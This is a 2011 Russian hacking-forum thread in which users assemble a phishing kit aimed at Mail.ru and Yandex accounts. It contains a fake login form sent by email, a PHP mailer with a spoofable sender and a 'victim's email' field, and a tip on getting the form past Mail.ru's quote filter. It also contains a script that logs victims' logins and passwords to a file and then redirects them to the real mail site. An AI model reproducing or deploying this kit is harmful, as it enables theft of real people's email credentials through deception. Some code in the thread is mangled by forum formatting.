html на маил.ру

Discussion in 'Уязвимости Mail-сервисов' started by qaz, 20 Jun 2011.

  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    отправляю на маил письмо в html форме такого содержания
    PHP:
    <html>
    <
    body>
    <
    form action "actionvhodreg.php" method "post">

    <
    br>

    <
    b>Логин:</b>

    <
    br>

    <
    input type="text" name "user_login"  MAXLENGTH 10 SIZE 15>
    <
    br>
    <
    b>Пароль:</b>

    <
    br>

    <
    input type="password"  name "user_pass" MAXLENGTH 20  SIZE 15>

    <
    br>

    <
    input type="submit" value="Вход">

    </
    form>
    </
    body>
    </
    html>
    а приходит письмо в таком виде

    [​IMG]

    чё ето за байда с кнопкой?
     
  2. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    скинь код сендера, у тебя код кривоватый по ходу. экранирует ковычки
     
    _________________________
    #2 Uex Urgent, 20 Jun 2011
    Last edited: 20 Jun 2011
    1 person likes this.
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    вот

    PHP:
    <?

    if(isset(
    $_POST['post']))
    {

    ignore_user_abort(1);

    $toz=!empty($_POST['to'])?$_POST['to']:NULL;
    $themez=!empty($_POST['theme'])?$_POST['theme']:NULL;
    $textz=!empty($_POST['text'])?$_POST['text']:NULL;
    $otz=!empty($_POST['ot'])?$_POST['ot']:NULL;




    $themezz "=?utf-8?b?"base64_encode($themez) ."?=";

    $headers .= "Content-type: text/html; charset=windows-1251\r\n";
    $headers .= "MIME-Version: 1.0\r\n"
    $headers .= "From: ".$otz."\n";
    $headers .= "Date: "date('D, d M Y h:i:s O') ."\r\n"
    $headers .= "X-Priority: 3\n"






    mail($toz$themezz$textz$headers);

    }
    ?>



    <form action ="" method="post" >

    <b>Мыло жертвы:</b><br><input type="text" name="to"  value="[email protected]"></br>

    <b>ОТ (мыло):</b><br><input type="text" name="ot"  value="[email protected]"></br>

    <b>Тема письма:</b><br><input type="text" name="theme" value="theme"></br>

    <b>Текст:</b><br><textarea name="text"  rows='15' cols='40'></textarea></br>
    <br>

    <input type="submit" value="Отправить" name="post"></center></form> 
     
  4. firetron

    firetron New Member

    Joined:
    20 Aug 2010
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    а причем здесь сендер?
    тс ты что первый раз? фильтр заменяет кавычку на слэш, вот поэтому такая лауда.
    вобщем убери везде кавычки и будет все гуд.
     
    1 person likes this.
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    точно, спасибо
     
  6. martmm

    martmm New Member

    Joined:
    29 Jan 2010
    Messages:
    80
    Likes Received:
    4
    Reputations:
    4
    Tc а как ты обходишь предупреждение об отправке данных mail?
     
  7. Ha_Vi

    Ha_Vi Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    17
    Likes Received:
    22
    Reputations:
    0
    Не по теме немного, н овсеже
    код actionvhodreg.php тогда какой будет, не разберусь никак, кто подскажет?
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    какое предупреждение?, непойму о чём ты
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    я себе сделал такой, для яндекса и майла, только форму отправки тогда тоже подредактируй
    PHP:
    <?


    $file log.txt;
    $log fopen("data.txt","at");
    fwrite($log,"\n $login.$Domain:$pass \n");
    fclose($log);

    if(
    $Domain == "@yandex.ru")
    {
    header("location: http://mail.yandex.ru");


    }
    else
    {

    header("location: http://e.mail.ru");
    }


    ?>
     
    1 person likes this.